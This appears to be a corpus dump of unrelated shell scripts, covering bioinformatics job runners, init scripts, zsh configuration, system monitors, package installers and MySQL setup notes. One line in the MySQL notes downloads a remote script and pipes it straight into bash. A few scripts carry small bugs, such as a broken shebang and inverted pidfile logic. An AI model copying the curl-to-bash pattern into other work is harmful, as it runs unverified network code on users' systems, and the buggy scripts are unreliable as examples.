## run under certain parameters.
## Default for F-seq is to produce a .npf file for each chromosome:
## e.g. 1.npf 2.npf ... X.npf
## These files are concatenated into one .npf file, and
## the resultant file named to match the original .bed file.
## Finally, this .npf file is moved into a new directory
## which is named as follows:
##
## fseq<l-setting><t-setting>_<sample-name>
##
## This folder is created IF it does not already exist.
## The ultimate result is the original folder containing the .bed
## file is returned to its original state (all intermediary
## NPF files are removed, F-seq can be run again) and an .npf
## file representing peaks is moved into an informatively
## named directory for subsequent analysis.
## To achieve this, inputs are:
## $1 ---> .bed file containing directory
## $2 ---> value for F-seq -l parameter
## $3 ---> value for F-seq -t parameter
## Note: Chromosomal NPF files (1.npf, 2.npf etc.) produced by
## the F-seq algorithm are deposited in a temporary subdirectory
## created within the .bed file containing directory.
## This allows for run_Fseq.sh to be run multiple times simultaneously
## on the same .bed file containing directory without the chromosomal NPF
## files (1.npf.. etc.) being confused.
echo "**********************************************************************"
echo "Run on host: "`hostname`
echo "Operating system: "`uname -s`
echo "Username: "`whoami`
echo "Started at: "`date`
echo "**********************************************************************"
### Define Input Directory, Parameter Values, Get Input File Name
bedDir=$1
bedFile=$(ls $bedDir/*.bed)
bedFile=${bedFile##*/}
lengthVal=$2
threshVal=$3
echo "Input File Directory:"$bedDir
echo "File Name:"$bedFile
echo "Feature Length Value (-l): "$lengthVal
echo "Threshold Value (-t): "$threshVal
echo ""
### Temporary Subdirectory to Output 1.npf, 2.npf, ... X.npf files
npfDirPrefix=$(echo "fseql"$lengthVal"t"$threshVal)
tempNpfDir=$(echo $bedDir"/"$npfDirPrefix)
if [ ! -d "$tempNpfDir" ]; then
mkdir $tempNpfDir
echo "Making Temporary Output Directory:"$tempNpfDir
echo ""
fi
### Run F-seq
fseq -d $bedDir -o $tempNpfDir \
-f 0 \
-l $lengthVal \
-t $threshVal \
-of npf \
-v
echo ""
echo "F-seq Complete"
echo "Catenating Output..."
echo ""
### Make Destination Directory for NPF file
npfDirSuffixClrPath=${bedDir##*/}
npfDirSuffix=${npfDirSuffixClrPath%_*}
npfDir=$(echo $npfDirPrefix"_"$npfDirSuffix)
if [ ! -d "$npfDir" ]; then
mkdir $npfDir
echo "Making Destination Directory:"$npfDir
echo ""
fi
npfFileName=$(echo $npfDir"/"$bedFile | sed 's/.bed$/.npf/')
cat $tempNpfDir/*.npf > $npfFileName
rm -r $tempNpfDir
echo "Output File:" $npfFileName
echo "Output Directory:" $npfDir
echo ""
echo "**********************************************************************"
echo "Finished at: "`date`
echo "**********************************************************************"
echo ""
echo ""
echo ""
| true |
24d206f6119bdf4b6f97db93b982868d2da76f1f | Shell | pillaiuma/shell | /one2.sh | UTF-8 | 262 | 2.515625 | 3 | [] | no_license | #1 bin/bash
echo "Enter the basic amount:"
read b
dp=$(((50*$b)/100))
da=$(((35*($b+$dp))/100))
hra=$(((8*($b+$dp))/100))
ma=$(((3*($b+$dp))/100))
pf=$(((10*($b+$dp))/100))
#echo $dp $da $hra $ma $pf
Salary=$((b+dp+da+hra+ma-pf))
echo "The Salary is: $Salary"
| true |
f10d399deb05bc471d94abe387faa2879a10cb86 | Shell | wileyj/public-puppet | /code/modules/local/base/files/etc/init.d/uchiwa | UTF-8 | 2,260 | 3.71875 | 4 | [] | no_license | #!/bin/sh
### BEGIN INIT INFO
# Provides: uchiwa
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Uchiwa, a Sensu dashboard.
# Description: Uchiwa, a Sensu dashboard, created by Simon Plourde.
### END INIT INFO
# Source function library.
. /etc/rc.d/init.d/functions
export PATH="$PATH:/usr/lib/golang/bin"
name="uchiwa"
user="$name"
appdir="/opt/$name"
program="/opt/$name/$name.go"
log_dir="/var/log/$name"
args="-c $appdir/config.json -p $appdir/public"
pidfile="/var/run/$name.pid"
lockfile="/var/lock/subsys/$name"
if [[ ! -z $log_dir ]]
then
mkdir -p $log_dir
chown -R $name:sensu $log_dir
fi
[ -r /etc/default/$name ] && . /etc/default/$name
[ -r /etc/sysconfig/$name ] && . /etc/sysconfig/$name
start() {
echo -n $"Starting $name: "
exec="cd $appdir && godep go run $name.go"
daemon "su -s /bin/sh $user -c '$exec >> $log_dir/uchiwa.log 2> $log_dir/uchiwa.err &' "
retval=$?
if [ $retval -eq 0 ]
then
getpid
# pid=`ps -ef | grep "sh -c cd /opt/uchiwa && godep go run uchiwa.go" | grep -v grep | awk '{print $2}'`
if [[ -z $pid ]]
then
echo $pid > $pidfile
else
return 2
fi
fi
echo
[ $retval -eq 0 ] && touch $lockfile
return $retval
}
stop() {
echo -n $"Stopping $name: "
killproc $name
retval=$?
if [ $retval -eq 0 ]
then
rm -f $pidfile
rm -f $lockfile
fi
echo
return $retval
}
getpid(){
pid=`ps -ef | grep "/tmp/go-build" | grep $name | awk '{print $2}'`
}
rh_status() {
status $name
}
rh_status_q() {
rh_status >/dev/null 2>&1
}
force_stop() {
if rh_status ; then
killall -HUP $name
rm -f $pidfile
rm -f $lockfile
fi
}
case "$1" in
start)
rh_status_q && exit 0
$1
;;
stop)
rh_status_q || exit 0
$1
;;
force-stop)
force_stop
;;
status)
rh_status
;;
restart)
stop
start
;;
*)
echo "Usage: $0 {start|stop|restart|status|force-stop}" >&2
exit 3
;;
esac
exit $? | true |
7dfb7a48978bdb82bd572d89de97728453ec856f | Shell | yoanyomba123/dotfiles | /zsh/zshrc.d/path.zsh | UTF-8 | 330 | 3.296875 | 3 | [] | no_license | # path.zsh
#
# This is where PATH gets modified.
#
##################################################
# set PATH so it includes private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
# set PATH so it includes scripts if it exists
if [ -d "$HOME/scripts" ] ; then
PATH="$HOME/scripts:$PATH"
fi
| true |
afbc9127aa90e7653efe8adb7e2b0deb5d51b91e | Shell | elibarzilay/drag-to-scroll | /make-zip | UTF-8 | 141 | 2.703125 | 3 | [] | no_license | #!/bin/sh
cd "$(dirname "$0")"
name="$(basename "$PWD")"
rm -f "../$name.zip"
git archive --output="../$name.zip" --prefix="$name/" master
| true |
17ba4b83274d7ab43bb8029d0ab1d2f8b5f278b4 | Shell | georgehaws/Scripting | /Create_Subdirectories | UTF-8 | 534 | 4.0625 | 4 | [] | no_license | #!/usr/bin/bash
# This script loops over a list of cleaned input data and creates matching subdirectories.
# These folders will be used to hold our local .git working repositories.
# They are hosted at: https://github.com/learn-co-students/NAME_OF_DIRECTORY
# First, we declare our variables:
targetParentDir="/home/george/Documents/Flatiron/Learnco/"
# Then, we loop over our input file (passed as a command line argument) and create our folders:
while IFS= read -r line; do
mkdir -p "$targetParentDir""$line"
done < "$1"
| true |
fc7ad3c58e608c9c1f91a0034231551f5846099c | Shell | rvega/config | /key-remap/keyboard_microsoft.sh | UTF-8 | 676 | 2.65625 | 3 | [] | no_license | #!/bin/bash
# To figure out the keycodes I used
# `xmodmap -pke` and `xev`
# To figure out the "remove" lines, look at the output
# of `xmodmap`
# Read https://wiki.archlinux.org/index.php/Xmodmap
####
# Capslock as Ctrl
setxkbmap -option ctrl:nocaps
# xmodmap -e "remove lock = Caps_Lock" 2> /dev/null
# xmodmap -e "keycode 66 = Control_L NoSymbol Control_L"
# xmodmap -e "add control = Control_L"
# Right menu as Ctrl
xmodmap -e "keycode 135 = Control_R NoSymbol Control_R"
xmodmap -e "add control = Control_R"
# Key repetition delay.
gsettings set org.gnome.desktop.peripherals.keyboard delay 251
gsettings set org.gnome.desktop.peripherals.keyboard delay 250
| true |
a4c0aecf88fd55d3063dd96e1edde7f9e9344f0a | Shell | alist/swarmsBeagleBoardPythonClientServer | /startup/SWARMSd | UTF-8 | 777 | 3.21875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#
# Start/stop the SWARMS daemons
#
# This file is linked in the Beagleboards /etc/init.d folder
# Also, it is linked from init.d, in etc/rc0.d for termination, rc3.d for startup, and rc5.d for normal os running
set -e
case "$1" in
start)
echo -n "Starting SWARMSd: "
start-stop-daemon -S -b -n SWARMSd -a /home/root/alex/drivePy/launchDrivePy.sh
echo "done"
;;
stop)
echo -n "Stopping SWARMSd: "
echo 0 > /sys/class/leds/beagleboard\:\:usr1/brightness
killall python
start-stop-daemon -K -n SWARMSd
echo "done"
;;
restart)
$0 stop
$0 start
;;
*)
echo "Usage: SWARMSInit { start | stop | restart }" >&2
exit 1
;;
esac
exit 0
| true |
b301ed9b313c55ace66b6341ff1256b9e699f7fe | Shell | alexkb/pound-tools | /check_pound_active_interactive.sh | UTF-8 | 1,826 | 4.4375 | 4 | [] | no_license | #!/bin/sh
# check_pound_active_interactive.sh - Script for determining pound thread usage repeatedly.
#
# This script can be useful to run when you want to monitor pound thread usage, perhaps
# whilst running load tests and experimenting with pound settings.
# Customisable variables
CHECK_POUND_ACTIVE_SLEEP_TIME=2 # number of seconds to sleep between each check. Don't set this too quickly, as it might cause load itself potentially.
POUND_PID_PATH=/var/run/pound.pid
echo "Press Ctrl-c to cancel."
while [ 1 -eq 1 ] ; do
# Read in PID file each time, incase pound gets restarted during testing.
if [ ! -e $POUND_PID_PATH ]; then
echo "Pound PID file not found. Will try again in 5 seconds."
sleep 5
continue
fi;
POUND_PID=$((`cat $POUND_PID_PATH`+1))
POUND_OUTPUT=`find /proc/${POUND_PID}/task/*/syscall -type f -exec cat {} \; -exec echo "|" \;`
ACTIVE=0
INACTIVE=0
TOTAL=0
for i in $(echo $POUND_OUTPUT | tr "|" "\n")
do
if [[ "$i" -eq "202" ]]; then
INACTIVE=$[$INACTIVE +1]
TOTAL=$[$TOTAL +1]
elif [[ "$i" -eq "7" || "$i" -eq "35" ]]; then
ACTIVE=$[$ACTIVE +1]
TOTAL=$[$TOTAL +1]
fi
done
# There are usually around 3 active threads that shouldn't be counted.
ACTIVE=$[$ACTIVE -3]
TOTAL=$[$TOTAL -3]
# Using the bc tool to do floating point calculations
PERC=$(echo "$ACTIVE*100/$TOTAL" | bc)
# Debug stuff
#echo "Active/Total/Percentage: $ACTIVE/$TOTAL/$PERC"
if [ $PERC -lt 70 ] ; then
STATUSTXT=OK
STATUS=0
elif [ $PERC -lt 80 ] ; then
STATUSTXT=WARNING
STATUS=1
else
STATUSTXT=CRITICAL
STATUS=2
fi
echo -ne "$STATUSTXT - percentage active threads: $PERC% \r"
sleep $CHECK_POUND_ACTIVE_SLEEP_TIME
done # End while loop
# Break to a new line, due to the -ne above.
echo ""
| true |
9cdf7e2a047d27c5ab8603272fd82ed2e2b4d885 | Shell | jonasduerto/freepbx-scripts | /disableisymphony/disableisymphony.sh | UTF-8 | 1,011 | 3.15625 | 3 | [] | no_license | #!/bin/bash
#############################################
# Created by Alex Leach - @ajleach #
# FreePBXHosting.com - @freepbxhosting #
# VERSION 1.3 RELEASE DATE JUN 12 2015 #
# DESC: DISABLES ISYMPHONY IF INSTALLED #
#############################################
echo ""
if rpm -qa | egrep -q iSymphonyServerV3;
then
if chkconfig iSymphonyServerV3;
then
service iSymphonyServerV3 stop &> /dev/null
chkconfig iSymphonyServerV3 off
echo -e "iSymphonyServerV3 has been disabled.\n"
else
echo -e "iSymphonyServerV3 is already disabled.\n"
service iSymphonyServerV3 stop &> /dev/null
exit 0
fi
elif rpm -qa | egrep -q iSymphonyServer;
then
if chkconfig iSymphonyServer;
then
service iSymphonyServer stop &> /dev/null
chkconfig iSymphonyServer off
echo -e "iSymphonyServer has been disabled.\n"
else
echo -e "iSymphonyServer is already disabled.\n"
service iSymphonyServer stop &> /dev/null
exit 0
fi
else
echo -e "iSymphony does not appear to be installed."
fi
| true |
b50e9630717db65bc686cacee14e0fd093eb7e70 | Shell | elyoni/dotfiles | /mail/install.sh | UTF-8 | 537 | 3.4375 | 3 | [] | no_license | #!/bin/bash
DIR=$(dirname "${BASH_SOURCE[0]}")
DIR=$(cd -P $DIR && pwd)
function install_davmail()
{
sudo apt-get install default-jre -y
sudo apt install $DIR/davmail_5.4.0-3135-1_all.deb
}
function install_evolution()
{
sudo add-apt-repository ppa:gnome3-team/gnome3-staging -y
sudo apt-get update
sudo apt-get install evolution -y
}
function remove_evolution()
{
ppa-purge gnome3-team/gnome3-staging
ppa-purge gnome3-team/gnome3
}
function install()
{
install_davmail
install_evolution
}
"$@"
| true |
a16a9aa359297b44669eb0eeb080653dc150e241 | Shell | jhillas/pulp3-scripts | /delete_pulp3_rpm_repo.sh | UTF-8 | 771 | 3.53125 | 4 | [] | no_license | #!/bin/env bash
##########################################
# Script: delete_pulp3_rpm_repo.sh
#
##########################################
set -e
echo "Type the name of the rpm repository"
read REPONAME
export REPONAME=$REPONAME
echo "Delete rpm repo named: $REPONAME ? (y/n)"
read yn
if [ ${yn} != y ]; then
echo "You selected ${yn}, exiting"
exit
fi
echo
export BASE_ADDR=${BASE_ADDR:-http://localhost:24817}
export CONTENT_ADDR=${CONTENT_ADDR:-http://localhost:24816}
export DJANGO_SETTINGS_MODULE=pulpcore.app.settings
# Parse out pulp_href using http and jq
export REPO_HREF=$(http GET $BASE_ADDR/pulp/api/v3/repositories/rpm/rpm/ | jq -r '.results[] | select(.name == env.REPONAME) | .pulp_href')
# Delete Repository
http DELETE $BASE_ADDR$REPO_HREF
exit | true |
141b96100712ceba555bbe15eb00140cecbba398 | Shell | gnoliyil/fuchsia | /build/rbe/remotetool.sh | UTF-8 | 1,789 | 3.890625 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
# Copyright 2021 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# See https://github.com/bazelbuild/remote-apis-sdks
set -uo pipefail
script="$0"
script_dir="$(dirname "$script")"
# defaults
config="$script_dir"/fuchsia-re-client.cfg
remotetool="$(which remotetool)" || {
cat <<EOF
No 'remotetool' found in PATH.
'remotetool' can be built and installed from:
https://github.com/bazelbuild/remote-apis-sdks
EOF
exit 1
}
usage() {
cat <<EOF
$script [remotetool options]
This script wraps around the 'remotetool' tool for convenience, by fixing
some common options.
remotetool --help:
EOF
"$remotetool" --help
}
remotetool_args=()
prev_opt=
# Extract script options before --
for opt
do
# handle --option arg
if test -n "$prev_opt"
then
eval "$prev_opt"=\$opt
prev_opt=
shift
continue
fi
# Extract optarg from --opt=optarg
case "$opt" in
*=?*) optarg=$(expr "X$opt" : '[^=]*=\(.*\)') ;;
*=) optarg= ;;
esac
case "$opt" in
--help|-h) usage; exit;;
# Forward all other options to remotetool
*) remotetool_args+=("$opt") ;;
esac
shift
done
test -z "$prev_opt" || { echo "Option is missing argument to set $prev_opt." ; exit 1;}
# Grab RBE action parameters from the config file.
service="$(grep "^service=" "$config" | cut -d= -f2)"
instance="$(grep "^instance=" "$config" | cut -d= -f2)"
auto_args=(
--service "$service"
--instance "$instance"
)
if grep -q "^use_application_default_credentials=true" "$config"
then auto_args+=( --use_application_default_credentials )
fi
full_command=( "$remotetool" "${auto_args[@]}" "${remotetool_args[@]}" )
echo "${full_command[@]}"
exec "${full_command[@]}"
| true |
f2e9b310241bb96a0d60d04010bcfcf651659317 | Shell | concanon-dev/ExtremeSearch | /oldmake/make-xsconvert.sh | UTF-8 | 723 | 2.734375 | 3 | [] | no_license | #
# (c) 2012-2014 Scianta Analytics LLC All Rights Reserved.
# Reproduction or unauthorized use is prohibited. Unauthorized
# use is illegal. Violators will be prosecuted. This software
# contains proprietary trade and business secrets.
#
if [ "$OSTYPE" = "cygwin" ]; then
gcc='x86_64-w64-mingw32-gcc -D _UNICODE'
Platform='Win/x64'
elif [[ $OSTYPE == darwin1? ]]; then
gcc=gcc
Platform='Mac'
else
gcc=gcc
Platform='Linux/x64'
fi
$gcc -o python/xsconvert -Wall -O2 -lm obj/$Platform/xsconvert.o obj/$Platform/saContext.o obj/$Platform/saContextCreate.o obj/$Platform/saConcept.o obj/$Platform/OLDsaLoadContext.o obj/$Platform/saOpenFile.o obj/$Platform/saSplunk.o obj/$Platform/saCSV.o -lm
| true |
30a71a948b0e7907603e29c9743810024168ba28 | Shell | zacknorman/StartScripts | /anon-os-utility.sh | UTF-8 | 2,333 | 3.75 | 4 | [] | no_license | #!/bin/bash
echo "$(tput setaf 6)!!THIS SCRIPT HAS ELEMENTS FROM THE PARROT AI SCRIPT!!$(tput sgr0)"
show_menu(){
NORMAL=`echo "\033[m"`
MENU=`echo "\033[36m"` #Blue
NUMBER=`echo "\033[33m"` #yellow
FGRED=`echo "\033[41m"`
RED_TEXT=`echo "\033[31m"`
ENTER_LINE=`echo "\033[33m"`
echo -e "${MENU}*********************************************${NORMAL}"
echo -e "$(tput setaf 3)Welcome to the Anon OS Utility [made by zaCC]$(tput sgr0)"
echo -e "\t\trev 0.1 07/20/2016"
echo -e "${MENU}**${NUMBER} 1)${MENU} Full Install [codename: kali-bleeding-edge] ${NORMAL}"
echo -e "${MENU}*********************************************${NORMAL}"
echo -e "${ENTER_LINE}Please enter a menu option and enter or ${RED_TEXT}enter to exit. ${NORMAL}"
echo -e "$(tput setaf 5) MORE FEATURES COMING SOON...$(tput sgr0)"
read opt
}
function option_picked() {
COLOR='\033[01;31m' # bold red
RESET='\033[00;00m' # normal white
MESSAGE=${@:-"${RESET}Error: Try again"}
echo -e "${COLOR}${MESSAGE}${RESET}"
}
function core_install() {
echo -e "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
echo -e "deb http://http.kali.org/kali kali-bleeding-edge contrib non-free main" >> /etc/apt/sources.list
apt-get update
gpg --keyserver pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6
gpg -a --export ED444FF07D8D0BF6 | apt-key add -
apt-get update
}
function init_function() {
clear
show_menu
while [ opt != '' ]
do
if [[ $opt = "" ]]; then
exit;
else
case $opt in
1) clear;
option_picked "Let's do this, then!";
core_install;
option_picked "it worked, try ' apt install setoolkit -t kali-bleeding-edge'!";
exit;
;;
x)exit;
;;
q)exit;
;;
\n)exit;
;;
*)clear;
option_picked "Invalid keypress";
show_menu;
;;
esac
fi
done
}
if [ `whoami` == "root" ]; then
init_function;
else
echo "$(tput setaf 1)ERROR:$(tput sgr0)U need root l0l"
exit 1
fi
echo "Finishing up, making things pretty"
sleep 5
echo "Thanks for using my script, Kali and Bleeding Edge repos have been installed! You may use $(tput setaf 3) sudo apt-get install -t kali-bleeding-edge [packagename] $(tput sgr0)to install from Bleeding-Edge."
| true |
b13367ab0aae847afeadc1fd64b9056f942e65ca | Shell | ilventu/aur-mirror | /elixir-git/PKGBUILD | UTF-8 | 1,094 | 2.921875 | 3 | [] | no_license | # Maintainer: Curtis McEnroe <programble@gmail.com>
pkgname=elixir-git
pkgver=20120324
pkgrel=1
pkgdesc="A modern approach to programming for the Erlang VM"
arch=('x86' 'x86_64')
url="http://elixir-lang.org/"
license=('Apache')
depends=('erlang>=R15B')
makedepends=('git' 'erlang>=R15B')
provides=('elixir')
conflicts=('elixir')
options=(!makeflags)
_gitroot="git://github.com/elixir-lang/elixir.git"
_gitname="elixir-src"
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
if [[ -d "$_gitname" ]]; then
cd "$_gitname" && git pull origin
msg "The local files are updated."
else
git clone "$_gitroot" "$_gitname"
fi
msg "GIT checkout done or server timeout"
msg "Starting build..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
make
}
package() {
cd "$srcdir/$_gitname-build"
mkdir -p "${pkgdir}/usr/lib/elixir"
cp -R bin/ ebin/ exbin/ "${pkgdir}/usr/lib/elixir"
mkdir -p "${pkgdir}/usr/bin"
ln -s ../lib/elixir/bin/{elixir,elixirc,iex} "${pkgdir}/usr/bin"
}
# vim:set ts=2 sw=2 et:
| true |
2c86f183b2b1c7aa558a0dc8245fa6e9a1662469 | Shell | atweiden/voidpkgs | /srcpkgs/libsodium/template | UTF-8 | 742 | 2.53125 | 3 | [
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] | permissive | maintainer="nox"
pkgname="libsodium"
version=1.0.18
revision=1
short_desc="Modern and easy-to-use crypto library"
homepage="https://libsodium.org/"
license="ISC"
distfiles="https://download.libsodium.org/libsodium/releases/$pkgname-$version.tar.gz"
checksum="6f504490b342a4f8a4c4a02fc9b866cbef8622d5df4e5452b46be121e46636c1"
build_style="gnu-configure"
configure_args="lt_cv_prog_compiler_static_works=yes"
post_install() {
vlicense LICENSE
}
libsodium-devel_package() {
short_desc+=" - development files"
depends="$sourcepkg>=${version}_$revision"
pkg_install() {
vmove usr/include
vmove "usr/lib/*.a"
vmove "usr/lib/*.so"
vmove usr/lib/pkgconfig
}
}
# vim: set filetype=sh foldmethod=marker foldlevel=0 nowrap:
| true |
846ff78c62c1e2331594782291ace0ef53423d82 | Shell | hengsin/hengsin | /com.github.hengsin.sysconfig.init/build.sh | UTF-8 | 949 | 3.359375 | 3 | [] | no_license | #!/bin/bash
script_dir=$(realpath $(dirname "$0"))
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [[ -f "$script_dir/idempiere_source.properties" ]]; then
source "$script_dir/idempiere_source.properties"
fi
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [[ -f "$script_dir/../idempiere_source.properties" ]]; then
source "$script_dir/../idempiere_source.properties"
fi
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [ -d "$script_dir/../idempiere/org.idempiere.p2.targetplatform" ]; then
IDEMPIERE_SOURCE=$(realpath "$script_dir/../idempiere")
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [ -d "$script_dir/../../idempiere/org.idempiere.p2.targetplatform" ]; then
IDEMPIERE_SOURCE=$(realpath "$script_dir/../../idempiere")
fi
fi
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
echo "IDEMPIERE_SOURCE environment variable not set"
exit 1
fi
echo $IDEMPIERE_SOURCE
export IDEMPIERE_SOURCE
mvn verify
| true |
10cd692ea47db0e2cd4d10c6f0b2b90782ebc6db | Shell | nautsio/workshop-swarm | /scripts/provision.sh | UTF-8 | 862 | 3.609375 | 4 | [] | no_license | #!/usr/bin/env bash
MACHINE_PREFIX=$1
MACHINE_ID=$2
NUM_INSTANCES=$3
generateNodeHostsLine() {
local IP="172.16.8.$((100+$1))"
local HOST=$(printf "$MACHINE_PREFIX-%02d" $1)
echo "$IP $HOST"
}
writeConsulNodeConfig() {
local BINDADDR="172.16.8.$((100+$MACHINE_ID))"
if [ $MACHINE_ID == 1 ]; then
printf '{"bootstrap": true, "bind_addr": "%s", "client_addr": "%s"}' $BINDADDR $BINDADDR | jq . > /etc/consul.d/node.json
else
printf '{"start_join": ["172.16.8.101"], "bind_addr": "%s", "client_addr": "%s"}' $BINDADDR $BINDADDR | jq . > /etc/consul.d/node.json
fi
}
function writeHostsFile() {
local LOCALHOST="127.0.0.1 localhost"
echo $LOCALHOST > /etc/hosts
for ((i=1; i<=$NUM_INSTANCES; i++))
do
echo $(generateNodeHostsLine $i) >> /etc/hosts
done
}
writeHostsFile
writeConsulNodeConfig
sudo service consul restart
| true |
2c5b78d3846d5f62077f3330050bd1cfa3f143f7 | Shell | jbustamante35/phytomorph | /Extraction/Pipelines/oneRing/Octerine/globalHelpers/fastOrderintoSets.sh | UTF-8 | 135 | 2.890625 | 3 | [] | permissive | #!/bin/bash
fileName=$(basename "$1")
baseName=${1/"$fileName"}
echo "$fileName" >> $2
#echo "$fileName" >> $3
#echo "$baseName" >> $2
| true |
35ded2c4c8bb43bef3f573ba1e0ce27b98545a3e | Shell | hongdago/Ushell | /record_file/parse_variable_length_records.sh | UTF-8 | 591 | 3.40625 | 3 | [] | no_license | #!/bin/sh
#处理变长记录文件
function parse_variable_length_records
{
>$OUTFILE
exec 1<&4
exec 1>$OUTFILE
while read RECORD
do
echo $RECORD | awk -F : '{print $1 $2 $3 $$ $5}' \
|while read BRANCH ACCOUNT NAME TOTAL DATEDUE
do
#process_data $BRANCH $ACCOUNT $NAME $TOTAL $DATEDUE
echo $BRANCH $ACCOUNT $NAME $TOTAL $DATEDUE
if (( $? !=0))
then
echo "Record Error : $RECORD" | tee -a $LOGFILE
fi
done
done<$INFILE
exec 1<&4
exec 4>&-
}
| true |
5b4b714d43d469c77579cf35fbbada251cc02bd1 | Shell | mert-ayhan/linux-benchmark | /benchmark.sh | UTF-8 | 706 | 3.984375 | 4 | [] | no_license | #! /bin/bash
if ! [ -x "$(command -v mpstat)" ]; then
echo 'error: sysstat is not installed.' >&2
exit 1
fi
if [ $# -ne 2 ]; then
echo "usage: ./benchmark.sh [file_name] [seconds]"
else
printf "Bencmark Started!\nData will be logged to ${1} every ${2} seconds.\n"
echo
echo "Date,Memory,Disk,CPU" >> $1
echo "Date,Memory,Disk,CPU"
end=$((SECONDS+3600))
while [ $SECONDS -lt $end ]; do
CURRENTDATE=`date +"%Y-%m-%d %T"`
MEMORY=$(free | awk 'FNR == 2 {print ($3/$2)*100"%"}')
DISK=$(df -h | awk '$NF=="/"{printf "%s,", $5}')
CPU=$(mpstat 1 1 | awk '/^Average/ {print 100-$NF"%"}')
echo $CURRENTDATE$MEMORY$DISK$CPU >> $1
echo $CURRENTDATE$MEMORY$DISK$CPU
sleep $2
done
fi
| true |
986da1485e70a82a0dadb88229e33ad927674fd8 | Shell | jappoker/walker-zsh-theme | /walker.zsh-theme | UTF-8 | 1,683 | 2.546875 | 3 | [] | no_license | # Modiefied from robbyrussell and inspired by jonathon.
# Apr 11, 2018 by Walker
# git
ZSH_THEME_GIT_PROMPT_PREFIX=" on %{$fg[green]%}"
ZSH_THEME_GIT_PROMPT_SUFFIX="%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_DIRTY=""
ZSH_THEME_GIT_PROMPT_CLEAN=""
ZSH_THEME_GIT_PROMPT_ADDED="%{$fg[green]%} ✚"
ZSH_THEME_GIT_PROMPT_MODIFIED="%{$fg[blue]%} ✹"
ZSH_THEME_GIT_PROMPT_DELETED="%{$fg[red]%} ✖"
ZSH_THEME_GIT_PROMPT_RENAMED="%{$fg[magenta]%} ➜"
ZSH_THEME_GIT_PROMPT_UNMERGED="%{$fg[yellow]%} ═"
ZSH_THEME_GIT_PROMPT_UNTRACKED="%{$fg[cyan]%} ✭"
local blue_op="%{$fg[blue]%}[%{$reset_color%}"
local blue_cp="%{$fg[blue]%}]%{$reset_color%}"
local top_tab="%{$fg[blue]%}╭──%{$reset_color%}"
local bottom_tab="%{$fg[blue]%}╰〢%{$reset_color%}"
local barline="%{$fg[blue]%}────%{$reset_color%}"
local hist_no="${blue_op}%{$fg[yellow]%}%h${blue_cp}"
local time_display="${blue_op}%{$fg[yellow]%}%t${blue_cp}"
local day_display="${blue_op}%{$fg[yellow]%}$(date +%a,%b%d)${blue_cp}"
if [ $USER = $DEFAULT_USER ]; then
local user_host="${blue_op}%{$fg_bold[cyan]%}%n$(git_prompt_info)$(git_prompt_status)%{$reset_color%}${blue_cp}"
else
local user_host="${blue_op}%{$fg_bold[cyan]%}%n%{$fg[blue]%}@%{$fg_bold[green]%}%m:%l$(git_prompt_info)$(git_prompt_status)%{$reset_color%}${blue_cp}"
fi
#local user_infoo="${blue_op}$(git_prompt_info)${blue_cp}"
local path_p="${blue_op}%{$fg_bold[cyan]%}%~%{$reset_color%}${blue_cp}"
local begcur="%(?,%{$fg_bold[green]%} ∷ %{$reset_color%},%{$fg_bold[red]%} ☋ %{$reset_color%})"
PROMPT="${top_tab}${time_display}${barline}${user_host}${barline}\
${hist_no}${barline}${day_display}\
${bottom_tab}${path_p}${begcur}"
| true |
069f27b70472f1f4edcee57df8158c6e3781e5b8 | Shell | yuhanfu/Samples | /Web_Service/mysql/backend.sh | UTF-8 | 1,010 | 2.75 | 3 | [] | no_license | # install mysql
sudo apt-get update
sudo apt-get install mysql-server # need specify password
# install python
sudo apt-get install python -y
# install gutil
curl https://sdk.cloud.google.com | bash # multiple yes
## mysql
# create table from mysql
CREATE TABLE twitter_test (
keyword varchar(255) NOT NULL,
uid varchar(255) NOT NULL,
hashtags varchar(1024) NOT NULL,
count BIGINT(8) NOT NULL
);
# doanload file
sudo gsutil cp gs://teamprojectcc/twitter/mapreduce2/* ./
# import data
LOAD DATA LOCAL INFILE 'part-00000' INTO TABLE twitter_test
FIELDS TERMINATED BY '\t'
## shell
mysqlimport --fields-terminated-by='\t' \
--local -u root -p password\
twitter \
twitter_test.tsv
# create index on keyword column
create index keyword_idx on twitter_test (keyword)
# check database size
SELECT table_schema "Data Base Name",
sum( data_length + index_length) / 1024 / 1024 "Data Base Size in MB"
FROM information_schema.TABLES GROUP BY table_schema;
| true |
6cd9e484e5e00f9afc7afacf7c3e39ae861c9782 | Shell | nbproject/nbproject | /vagrant_provision.sh | UTF-8 | 1,684 | 3.34375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -ex
mkdir -p /milestones
if [[ ! -e nbproject ]]; then
echo "Can't find nbproject directory. Make sure NFS is installed and running (systemctl status nfs-server)\n If NFS isn't available on your system, disable the nfs option for the sync folder in the Vagrantfile."
exit 1
fi
cd nbproject
MILESTONE=/milestones/prereqs
if [[ ! -e ${MILESTONE} ]]; then
make prereqs
touch ${MILESTONE}
fi
MILESTONE=/milestones/prereqs
if [[ ! -e ${MILESTONE} ]]; then
a2enmod headers
apache2ctl restart
touch ${MILESTONE}
fi
MILESTONE=/milestones/pip_requirements
if [[ ! -e ${MILESTONE} ]]; then
pip3 install -r requirements.txt
touch ${MILESTONE}
fi
MILESTONE=/milestones/npm_install
if [[ ! -e ${MILESTONE} ]]; then
su vagrant -c 'npm install'
touch ${MILESTONE}
fi
MILESTONE=/milestones/make_django1
if [[ ! -e ${MILESTONE} ]]; then
su vagrant -c 'make django'
touch ${MILESTONE}
fi
